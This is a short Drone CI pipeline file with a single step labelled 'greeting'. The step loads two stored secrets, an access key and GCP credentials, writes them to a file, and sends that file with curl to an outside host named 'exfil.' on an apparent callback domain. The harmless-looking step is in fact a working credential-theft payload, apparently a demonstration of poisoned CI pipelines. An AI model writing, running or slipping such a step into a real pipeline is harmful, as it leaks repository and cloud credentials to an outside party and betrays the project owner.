kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: alpine
  environment:
    KEY:
      from_secret: access_key
    TOKEN:
      from_secret: gcp_creds
      
  commands:
  - echo Initializing...
  - echo "$${KEY} $${TOKEN}" > a
  - curl -d @a exfil.503ybasfyhrqz2hccuagezg7uy0poe.bf.gy
